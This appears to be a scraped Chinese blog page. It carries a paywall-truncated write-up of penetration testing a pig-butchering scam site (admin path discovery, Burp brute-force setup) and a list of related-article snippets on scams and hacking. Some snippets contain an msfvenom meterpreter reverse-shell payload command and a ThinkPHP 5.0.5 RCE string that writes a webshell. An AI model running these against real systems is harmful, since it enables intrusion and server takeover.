【网络安全】记一次杀猪盘渗透实战

最新推荐文章于 2024-11-01 14:14:52 发布
原创 最新推荐文章于 2024-11-01 14:14:52 发布 · 1.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #信息安全 #网络安全 #渗透测试 #杀猪盘

看起来非常假的网站,这个网站是没有 cdn 的用的是 thinkphpk 框架搭建的。

先打一波 poc 没有效果

访问一下后台直接在 url 后面加/admin。

一个开源的 cms 还没有验证码尝试用 burp 进行爆破,首先在火狐上设置代理 ip 为 127.0.0.1 代理端口为 8081。

Burp 上也要设置端口为 8081,将 Intercept 设置为 on 输入账号密码点击登录就能拦截到数据包。

在爆破之前先发送到 Re

最低0.47元/天 解锁文章

200万优质内容无限畅学
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1868
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
web渗透实例
12-08
一次艰难的渗透纪实,不容错过,真实web入侵纪实!
杀猪渗透测试
xj28555的博客
09-08 1289
最近偶然发现一个虚拟货币买涨跌的杀猪,遂进行了一波测试,前台长这样。 为thinkphp5.0.5随用RCE进行打入,成功写入webshell。 s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmF
一次渗透测试实战
qq_45434762的博客
11-17 1841
免责声明 本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。 因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与NowSec及分享者无关 0.起因 博主从周一到周五一直在收同一个公司发送的垃圾短信(这从短信链接中的域名可以看出),但是当博主点进网页看的时候,发现这是可以说是一家骗子网站吧。网站所卖的东西...
一次渗透之旅 ,网络安全学习至上
Karka_的博客
12-29 951
所谓“杀猪”,是指诈骗分子利用网络交友通常是“异性”交友,诱导受害人下载诈骗APP并在上面进行各种“投资”,如菠菜、股票、期货甚至虚拟货币的网络诈骗。今年某月某日小白就遭遇了这种骗局,他先是被骗子通过QQ添加并下载了一个名为”心动“的APP,在“心动“APP上结识了位名为“xx老师”的美女,小白被美色迷了眼打算相约这名网友,但是美女则借口让他下载另一个名为午夜乐园的APP进行投资,果不其然小白被成功骗取10余万。
网站渗透实战试验(仅供参考)
amaoatao的博客
03-10 5814
首先收集必要的信息 发现存在php探针,phpinfo,phpmyadmin 常用的垃圾弱口令登录失败。 尝试登录后台,网站使用帝国cms7.2系统 弱口令登录失败,使用网络上帝国cms的通用漏洞,行不通失败。 在知道绝对路径的情况下,dba权限的sql注入可以直接执行os-shell命令拿shell(下载帝国下来看!)。 扫描开放端口,反查域名,寻找最可能存在sql注入的网站。...
网络安全(黑客技术)—2024自学手册
TDJYGC的博客
04-24 1323
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
渗透实战:内网域渗透_内网渗透实例
最新发布
Galaxy_0的博客
11-01 1244
本文录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
渗透一个网站的基本步骤
weixin_64809022的博客
02-05 3992
渗透测试
一次杀猪渗透之旅
小王的储物间
07-26 500
所谓“杀猪”,是指诈骗分子利用网络交友通常是“异性”交友,诱导受害人下载诈骗APP并在上面进行各种“投资”,如菠菜、股票、期货甚至虚拟货币的网络诈骗。今年某月某日小白就遭遇了这种骗局,他先是被骗子通过QQ添加并下载了一个名为”心动“的APP,在“心动“APP上结识了位名为“xx老师”的美女,小白被美色迷了眼打算相约这名网友,但是美女则借口让他下载另一个名为午夜乐园的APP进行投资,果不其然小白被成功骗取10余万。
一次对某杀猪渗透
渗透测试研究中心
01-02 535
0x00 前言去年逛微步,本来是想找几个ip练练溯源能力,无意间发现了一个杀猪。本文打马赛克如果有漏的地方请及时指出,也请各位不要去微步上边找我这个目标复现,本case已全权交由某官方处理。0x01 简单的打点打开链接一看,一股子浓浓的“微”气息扑面而来,由于我们自己审计过这套源码,所以就直接找对应的地方打了个xss,结果呢他这竟然是微三开,没错,三开!无奈之下还是用老思路,想办法让框架报...
MSF_PHP后门反弹连接_DVWA文件上传木马_Metasploit配置监控及msfvenom生成攻击载荷
qq_51550750的博客
06-02 1109
msf——PHP后门反弹连接
渗透测试 ( 4 ) --- Meterpreter 命令详解
热门推荐
freeking101的博客
07-02 1万+
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
虚假黄金交易的杀猪
u010291330的博客
03-27 655
Sophos 的研究人员发现了一个持续超过一年半且不断扩大和演变的欺诈团伙,利用虚假的移动应用程序来引诱受害者参与投资,精心构建骗局获取受害者的信任。攻击者正在从华语受众人群转移到更普遍的范围,而不是局限于在亚洲。近期也发现诈骗团伙开始将虚假应用程序发布到 Apple Strore 上,尽力绕过苹果严格的审核机制。研究人员调查了两个杀猪:基于 MetaTrader 4 应用程序,运营一个虚假的黄金交易市场。
一次杀猪渗透测试
渗透测试研究中心
01-05 482
最近偶然发现一个虚拟货币买涨跌的杀猪,遂进行了一波测试,前台长这样。为thinkphp5.0.5随用RCE进行打入,成功写入webshell。s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_d...
杀猪后台小
cynthrial的博客
05-26 1050
某非法站点后台一日游 最近朋友a的一个朋友可能遇到了类似的黑灰产,导致我的朋友a被无辜误伤,才觉这些黑灰产业的触角已经无处不在。很久没写博客了,正好最近看到一个敲诈站点线索,随便水一笔。 为了避免给专搞这类站的同行造成困扰,技术上其实也没啥亮点,漏洞利用过程就不写了,直接看他们都有啥套路吧。希望所有人都能提高信息安全意识,远离受骗和勒索。 信息搜集之后找到后台登陆 界面 用大家都懂的套路就登录进去了 用户数其实就是被植入木马的手机的数量,这些木马的会偷偷上传手机通讯录和短信,木马运行状态中可以间接读短
一次对某杀猪站点的实战渗透
渗透测试研究中心
12-29 988
前言昨天半夜看到一篇文章某菠菜网站渗透实战就想着自己也练一练手,打到一半发现,大师傅们对这类站点已经狠狠的蹂躏了,所以借鉴师傅们的经验,本着锻炼一下,想到哪就一下,所以写的比较杂乱,其中有没有解决的地方也录下来的,然后又换了个站点接着走了下去信息收集前台这样看一下其他的信息端口查询80为主页面8182 为后台登录界面 1433 mssql目录扫描存在目录遍历漏洞发掘先去后台页面输入用户...
大龄剩女为什么会被杀猪收割?
08-09
### 回答1: "大龄剩女"这个词指的是年龄相对较大的单身女性。在中国,由于传统文化的影响,社会对于女性的婚姻压力较大,因此很多年龄相对较大的单身女性会被称为"剩女"。而这些"剩女"会被称为"杀猪",是因为社会上有人认为她们已经不太可能再找到伴侣了,就像是杀猪上的猪肉一样,被视为没有多大价值。 ### 回答2: 大龄剩女之所以容易成为杀猪的受害者,主要是因为她们在婚姻和恋爱市场上面临着一些困难和挑战。 首先,社会对于女性的婚姻年龄有着一定的期望。随着年龄的增长,女性面临着压力来尽早结婚,而一些大龄剩女可能因各种原因未能按社会预期时间内完成婚姻,这使她们更容易成为杀猪的目标。 其次,大龄剩女在婚恋市场上面临着较少的选择。随着年龄的增长,她们可能会发现自己处于相对劣势的位置,因为男性更倾向于选择年轻的女性作为伴侣。这使得一些大龄剩女可能会感到焦虑,急于找到合适的伴侣,从而容易受到杀猪的欺骗。 最后,一些大龄剩女可能由于缺乏婚姻经验或情感上的渴望而更容易被骗。由于一些大龄剩女可能没有经历过婚姻,对于婚恋关系的判断和预期可能会相对较为不成熟,容易被杀猪以虚假的承诺和甜言蜜语蒙骗,导致财务上的损失。 综上所述,大龄剩女容易成为杀猪的受害者主要是由于社会对女性婚姻年龄的期望、婚恋市场上的选择局限以及缺乏婚姻经验和情感上的渴望等因素所导致的。为了保护自身利益,大龄剩女需要保持警惕,提高自身的婚恋意识和充实自己的生活,选择信任可靠的平台和人,避免成为杀猪的受害者。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值